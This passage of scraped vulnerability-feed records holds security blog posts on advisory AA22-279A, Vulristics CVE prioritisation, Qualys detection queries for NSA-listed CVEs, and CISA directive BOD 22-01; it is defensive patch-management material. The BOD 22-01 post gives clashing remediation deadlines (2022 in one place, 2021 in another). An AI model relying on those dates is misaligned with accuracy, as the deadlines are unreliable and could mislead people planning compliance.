[1337DAY-ID-36893](<https://vulners.com/zdt/1337DAY-ID-36893>) - Moodle Teacher Enrollment Privilege Escalation / Remote Code Execution Exploit\n 4. 
[1337DAY-ID-36894](<https://vulners.com/zdt/1337DAY-ID-36894>) - Moodle Authenticated Spelling Binary Remote Code Execution Exploit\n\n"Moodle is a free and open-source learning management system. it is used for blended learning, distance education, flipped classroom and other e-learning projects in schools, universities, workplaces and other sectors". Surely some organizations make it available on the network perimeter and do not update it regularly.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-21T00:23:01", "type": "avleonov", "title": "Security News: Microsoft Patch Tuesday October 2021, Autodiscover, MysterySnail, Exchange, DNS, Apache, HAProxy, VMware vCenter, Moodle", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005", "CVE-2021-26427", "CVE-2021-34453", "CVE-2021-36970", "CVE-2021-40346", "CVE-2021-40449", "CVE-2021-40469", "CVE-2021-40486", "CVE-2021-41348", "CVE-2021-41350", "CVE-2021-41773"], "modified": "2021-10-21T00:23:01", "id": "AVLEONOV:99215B2D7808C46D8762AD712CD3D267", "href": 
"https://avleonov.com/2021/10/21/security-news-microsoft-patch-tuesday-october-2021-autodiscover-mysterysnail-exchange-dns-apache-haproxy-vmware-vcenter-moodle/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-23T15:50:43", "description": "Hello everyone! This episode will be about the new hot twenty vulnerabilities from CISA, NSA and FBI, [Joint cybersecurity advisory (CSA) AA22-279A](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>), and how I analyzed these vulnerabilities using my open source project [Vulristics](<https://github.com/leonov-av/vulristics>). \n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239105>\n\nAmericans can't just release a list of "20 vulnerabilities most commonly exploited in attacks on American organizations." They like to add geopolitics and point the finger at some country. Therefore, I leave the attack attribution mentioned in the advisory title without comment.\n\nBut I like such lists of vulnerabilities for a number of reasons:\n\n * Such lists of **vulnerabilities** show which CVEs need to be addressed. This is the most obvious. If you notice vulnerabilities from the list in your infrastructure, start fixing them as soon as possible.\n * Such lists of vulnerabilities show the **software and hardware products** that are most important to monitor. This means that your vulnerability scanner must support this software very well. Make sure you can verify this.\n * Such lists of vulnerabilities show **groups of software and hardware products **that need to be monitored first. 
Usually these are products that are available to a wide range of users and are inconvenient to upgrade.\n * Such lists of vulnerabilities show **the types of vulnerabilities** that you need to pay attention to first.\n * Such lists of vulnerabilities are relatively compact and **can be easily analyzed** even manually.\n\nI can't help but notice that the quality of the advisory is not very high. For example, the description of vulnerabilities was automatically taken from NVD. Including this: \n\n"Microsoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078". \n\nNot very informative, right? This joint advisory was released by three big serious organizations. They could work harder and write a unique text for each of the 20 CVEs. But no one seems to care.\n\nHere is a list of all vulnerabilities from the advisory:\n\n 1. Apache Log4j CVE-2021-44228 Remote Code Execution\n 2. Pulse Connect Secure CVE-2019-11510 Arbitrary File Read\n 3. GitLab CE/EE CVE-2021-22205 Remote Code Execution\n 4. Atlassian CVE-2022-26134 Remote Code Execution\n 5. Microsoft Exchange CVE-2021-26855 Remote Code Execution\n 6. F5 Big-IP CVE-2020-5902 Remote Code Execution\n 7. VMware vCenter Server CVE-2021-22005 Arbitrary File Upload\n 8. Citrix ADC CVE-2019-19781 Path Traversal\n 9. Cisco Hyperflex CVE-2021-1497 Command Line Execution\n 10. Buffalo WSR CVE-2021-20090 Relative Path Traversal\n 11. Atlassian Confluence Server and Data Center CVE-2021-26084 Remote Code Execution\n 12. Hikvision Webserver CVE-2021-36260 Command Injection\n 13. Sitecore XP CVE-2021-42237 Remote Code Execution\n 14. F5 Big-IP CVE-2022-1388 Remote Code Execution\n 15. Apache CVE-2022-24112 Authentication Bypass by Spoofing\n 16. ZOHO CVE-2021-40539 Remote Code Execution\n 17. Microsoft CVE-2021-26857 Remote Code Execution\n 18. Microsoft CVE-2021-26858 Remote Code Execution\n 19. 
Microsoft CVE-2021-27065 Remote Code Execution\n 20. Apache HTTP Server CVE-2021-41773 Path Traversal\n\nOf course, I did not deny myself the pleasure of using this list of CVEs as input for my [Vulristics vulnerability prioritization tool](<https://github.com/leonov-av/vulristics>). Just to see how Vulristics handles it and tweak Vulristics if needed.\n\nHere is the command I used to generate the report:\n \n \n $ python3.8 vulristics.py --report-type \"cve_list\" --cve-project-name \"AA22-279A\" --cve-list-path joint_cves.txt --cve-data-sources \"ms,nvd,vulners,attackerkb\" --cve-comments-path comments.txt --rewrite-flag \"True\"\n\nThe full report is here: <https://avleonov.com/vulristics_reports/aa22-279a_report_with_comments_ext_img.html>\n\n## Vulnerable Products\n\nIf you look at the list of vulnerable software and hardware products, then some of them, obviously, should have been included in this advisory. Because lately there have been a lot of publications about how attackers exploit the vulnerabilities in these products:\n\n * Apache HTTP Server\n * Apache Log4j2\n * GitLab\n * Microsoft Exchange\n * Confluence Server\n * Zoho ManageEngine ADSelfService Plus\n * Pulse Connect Secure\n\nThe second group of products. For them, there were also publications about attacks. But it seems that these are more niche products and are less perceived as targets for attackers:\n\n * BIG-IP\n * Citrix Application Delivery Controller\n * VMware vCenter\n * Cisco HyperFlex HX\n\nAnd finally, there are quite exotic products that apparently reflect the specifics of American IT:\n\n * Sitecore Experience Platform (XP)\n * Hikvision Web Server\n * Apache APISIX\n * Buffalo WSR\n\n## Criticality of Vulnerabilities\n\nVulristics has identified all vulnerabilities as vulnerabilities of the highest criticality level (Urgent). 
Vulristics found public exploits for all vulnerabilities.\n\nAt the same time, if you look at CVSS, then there is this:\n\nAll vulnerabilities: 20 \nCritical: 16 \nHigh: 4 \nMedium: 0 \nLow: 0\n\nSo if you are using CVSS for prioritization, don't forget about the High level vulnerabilities.\n\n## Detected Types of Vulnerabilities\n\n * Remote Code Execution\n * Command Injection\n * Arbitrary File Reading\n * Authentication Bypass\n * Path Traversal\n\nAs we can see, all vulnerabilities are obviously critical except for one "Path Traversal":\n\nPath Traversal - Citrix Application Delivery Controller (CVE-2019-19781)\n\nThe description of the vulnerability leaves no room for detecting another type:\n\n"An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal".\n\nThe same type is indicated in the advisory AA22-279A: Citrix ADC CVE-2019-19781 Path Traversal\n\nAnd only [in the description of the exploit](<https://github.com/trustedsec/cve-2019-19781>) we can see that this is in fact RCE: "This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used to append files in an XML format to the victim machine. This in turn allows for **remote code execution**."\n\nWell, this is another reminder to us that we should not do hard filtering by vulnerability type. It's also not a good idea to trust the description from NVD. The type of vulnerability may change over time, and no one will make changes to the description in NVD.\n\nIn some cases, Vulristics can help to more accurately determine the type of vulnerability:\n\nAA22-279A: Apache HTTP Server CVE-2021-41773 Path Traversal \nVulristics: Remote Code Execution - Apache HTTP Server (CVE-2021-41773)\n\nWhy? 
Because we can read in the description: "If CGI scripts are also enabled for these aliased pathes, this could allow for **remote code execution**."\n\nBut of course Vulristics is not a silver bullet. It is difficult to come up with something here other than manual analysis of publications about vulnerabilities and exploits.\n\nI also cannot help but point out that for some of the vulnerabilities, Vulristics determined the types of vulnerabilities more correctly in accordance with the description:\n\nAA22-279A: GitLab CE/EE CVE-2021-22205 Remote Code Execution \nVulristics: Command Injection - GitLab (CVE-2021-22205) - Urgent [947] \n"\u2026 which resulted in a **remote command execution**."\n\nAA22-279A: Sitecore XP CVE-2021-42237 Remote Code Execution \nVulristics: Command Injection - Sitecore Experience Platform (XP) (CVE-2021-42237) \n"\u2026 it is possible to achieve **remote command execution** on the machine."\n\nAA22-279A: VMware vCenter Server CVE-2021-22005 Arbitrary File Upload \nVulristics: Remote Code Execution - VMware vCenter (CVE-2021-22005) \n"\u2026may exploit this issue **to execute code** on vCenter Server by uploading a specially crafted file."\n\nAA22-279A: F5 Big-IP CVE-2022-1388 Remote Code Execution \nVulristics: Authentication Bypass - BIG-IP (CVE-2022-1388) \n"\u2026 undisclosed requests **may bypass** iControl REST **authentication**"\n\nAA22-279A: Apache HTTP Server CVE-2021-41773 Path Traversal \nVulristics: Remote Code Execution - Apache HTTP Server (CVE-2021-41773) \n"\u2026 this could allow for **remote code execution**."\n\nAA22-279A: Apache CVE-2022-24112 Authentication Bypass by Spoofing \nVulristics: Remote Code Execution - Apache APISIX (CVE-2022-24112) \n"\u2026 is vulnerable to **remote code execution**."\n\nAA22-279A: Buffalo WSR CVE-2021-20090 Relative Path Traversal \nVulristics: Authentication Bypass - Buffalo WSR (CVE-2021-20090) \n"\u2026 allow unauthenticated remote attackers to **bypass authentication**."\n\nTherefore, 
do not rush to trust the vulnerability type from the [CISA Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) and take it into account when prioritizing vulnerabilities.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-21T20:10:13", "type": "avleonov", "title": "Joint Advisory AA22-279A and Vulristics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-21T20:10:13", "id": "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246", "href": "https://avleonov.com/2022/10/21/joint-advisory-aa22-279a-and-vulristics/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-10-12T20:01:11", 
"description": "On October 6, 2022, the United States National Security Agency (NSA) released a [cybersecurity advisory](<https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF>) on cyber activity conducted by state-sponsored actors of the Chinese government, officially the People\u2019s Republic of China (PRC), in pursuit of national interests. These malicious cyber activities attributed to the Chinese government have targeted, and continue to target, a range of industries and organizations in the United States. The advisory lists the top CVEs used since 2020 by PRC state-sponsored cyber actors, as assessed by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI). PRC actors continue to exploit known vulnerabilities against U.S. and allied networks and against software and hardware companies in order to steal intellectual property and gain access to sensitive networks. \n\nThe agencies describe PRC state-sponsored cyber activity as one of the most significant and dynamic threats to U.S. government and civilian networks. PRC state-sponsored cyber actors persist in targeting government and critical infrastructure networks with an increasing array of new and adaptive techniques. Some could pose a considerable risk to the Information Technology Sector, telecommunications organizations, the Defense Industrial Base (DIB) Sector, and other critical infrastructure organizations. \n\nPRC state-sponsored cyber actors continue to exploit known vulnerabilities and use publicly available tools to target victims. 
Here is a list of 20 publicly known vulnerabilities (CVEs) published by the NSA, along with affected products and associated Qualys VMDR QID(s) for each vulnerability: \n\n**Vendor** | **CVE** | **Vulnerability Type** | **Qualys QID(s)** \n---|---|---|--- \nApache Log4j | CVE-2021-44228 | Remote Code Execution | 730302, 150441, 150440, and more \nPulse Connect Secure | CVE-2019-11510 | Arbitrary File Read | 38771 \nGitLab CE/EE | CVE-2021-22205 | Remote Code Execution | 375475 \nAtlassian | CVE-2022-26134 | Remote Code Execution | 730514, 376657, 150523 \nMicrosoft Exchange | CVE-2021-26855 | Remote Code Execution | 50107, 50108 \nF5 Big-IP | CVE-2020-5902 | Remote Code Execution | 38791, 373106 \nVMware vCenter Server | CVE-2021-22005 | Arbitrary File Upload | 216265, 216266 \nCitrix ADC | CVE-2019-19781 | Path Traversal | 372685, 150273, 372305 \nCisco Hyperflex | CVE-2021-1497 | Command Line Execution | 730070 \nBuffalo WSR | CVE-2021-20090 | Relative Path Traversal | NA \nAtlassian Confluence Server and Data Center | CVE-2021-26084 | Remote Code Execution | 150368, 375839, 730172 \nHikvision Webserver | CVE-2021-36260 | Command Injection | NA \nSitecore XP | CVE-2021-42237 | Remote Code Execution | 14012 \nF5 Big-IP | CVE-2022-1388 | Remote Code Execution | 150511, 730489, 376577 \nApache | CVE-2022-24112 | Authentication Bypass by Spoofing | 730361 \nZOHO | CVE-2021-40539 | Remote Code Execution | 375840 \nMicrosoft | CVE-2021-26857 | Remote Code Execution | 50107 \nMicrosoft | CVE-2021-26858 | Remote Code Execution | 50107 \nMicrosoft | CVE-2021-27065 | Remote Code Execution | 50107 \nApache HTTP Server | CVE-2021-41773 | Path Traversal | 150373, 150372, 710595 and more \n\nTable 1: Top CVEs most used by Chinese state-sponsored cyber actors since 2020 \n\nNSA stated that the threat actors use virtual private networks (VPNs) to obscure their activities and establish initial access. 
Multiple CVEs listed in Table 1 let the actors stealthily gain unauthorized access to sensitive networks, after which they seek to establish persistence and move laterally to other internally connected networks. \n\nThe NSA highlights how the People\u2019s Republic of China (PRC) has targeted and compromised major telecommunications companies and network service providers, mostly by exploiting publicly known vulnerabilities. Affected networks have ranged from small office/home office (SOHO) routers to medium and large enterprise networks. \n\nPRC state-sponsored cyber actors readily exploit vulnerabilities to compromise unpatched network devices. These devices, such as Small Office/Home Office (SOHO) routers and Network Attached Storage (NAS) devices, serve as additional access points for routing command and control (C2) traffic and as a means of conducting network intrusions against other entities. Furthermore, cyber defenders, who are occupied with keeping pace with frequent software patching of Internet-facing services and endpoint devices, often overlook these devices. \n\n## Detect & Prioritize 20 Publicly Known Vulnerabilities using VMDR 2.0 \n\nQualys has released several remote and authenticated QIDs for commonly exploited vulnerabilities. 
You can search for these QIDs in the Vulnerabilities tab of [Qualys VMDR 2.0](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) by using the following QQL query: \n\n_vulnerabilities.vulnerability.cveIds: [CVE-2021-44228, CVE-2019-11510, CVE-2021-22205, CVE-2022-26134, CVE-2021-26855, CVE-2020-5902, CVE-2021-22005, CVE-2019-19781, CVE-2021-1497, CVE-2021-20090, CVE-2021-26084, CVE-2021-36260, CVE-2021-42237, CVE-2022-1388, CVE-2022-24112, CVE-2021-40539, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-41773]_ \n\n\n\nUsing [Qualys VMDR 2.0](<https://www.qualys.com/apps/vulnerability-management-detection-response/>), you can also effectively prioritize these vulnerabilities using [Qualys TruRisk](<https://blog.qualys.com/vulnerabilities-threat-research/2022/10/10/in-depth-look-into-data-driven-science-behind-qualys-trurisk>).\n\n\n\n## Identify Vulnerable Assets using Qualys Threat Protection \n\nIn addition, you can locate vulnerable hosts through Qualys Threat Protection by simply clicking on the impacted hosts. This helps in effectively identifying and tracking these vulnerabilities. \n\n\n\nUsing the Qualys Unified Dashboard, you can track impacted hosts, their status, and overall management in real time. With trending enabled for dashboard widgets, you can keep track of the vulnerability trends in your environment. \n\nRead the Article (Qualys Customer Portal): [NSA Top Exploited CVEs | China State Actors](<https://success.qualys.com/support/s/article/000007011>) \n\n\n\n## Recommendations & Mitigations \n\nThe NSA, CISA, and FBI recommend that U.S. and allied governments, critical infrastructure, and private sector organizations use the mitigation guidance provided to boost their defensive posture and decrease the threat of compromise from PRC state-sponsored cyber actors. 
\n\nHere is a summary of the mitigation guidance provided by the NSA: \n\n * Update, prioritize, and patch vulnerable systems as soon as possible, as listed in this article and in the [CISA KEV](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) catalog. \n * Utilize phishing-resistant multi-factor authentication and require all accounts to have a unique and strong password. \n * Block obsolete or unused protocols at the network edge. \n * Upgrade or replace end-of-life devices. \n * Move toward the Zero Trust security model. \n * Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity. \n\nOne of the soundest ways for organizations of all sizes to stay on top of these vulnerabilities and of end-of-life (EOL) network and device infrastructure, as noted in the NSA's general mitigation guidelines, is to catalog the affected assets and apply patches as soon as possible. This becomes a straightforward process for organizations that use Qualys VMDR 2.0. You can start your [Qualys VMDR 2.0 trial](<https://www.qualys.com/subscriptions/vmdr/>) to automatically identify, detect, and patch the high-priority commonly exploited vulnerabilities. 
\n\n## Contributors\n\n * Felix Jimenez Saez, Director, Product Management, Qualys\n * Swapnil Ahirrao, Principal Product Manager, VMDR, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-07T20:03:01", "type": "qualysblog", "title": "NSA Alert: Topmost CVEs Actively Exploited By People\u2019s Republic of China State-Sponsored Cyber Actors", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-07T20:03:01", "id": "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial 
today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), "Reducing the Significant Risk of Known Exploited Vulnerabilities." [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update their internal vulnerability management procedures within 60 days and to remediate each vulnerability according to the timelines outlined in CISA's vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations' digital infrastructure and automate remediation. Qualys' guidance for rapid response to the Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. 
You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) is already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 vulnerabilities (34%) need to be patched within the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months, or by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. 
Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n\n\nUsing [Qualys 
VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n\n\nIn addition, you can locate vulnerable hosts through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track these vulnerabilities.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and view your status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the ["CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES"](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n\n\n### Summary Dashboard High Level Structured by Vendor:\n\n\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most "Category 2" vulnerabilities by **November 17, 2021**, and "Category 3" by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help comply with the directive's aggressive remediation date of November 17, 2021. 
Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not 
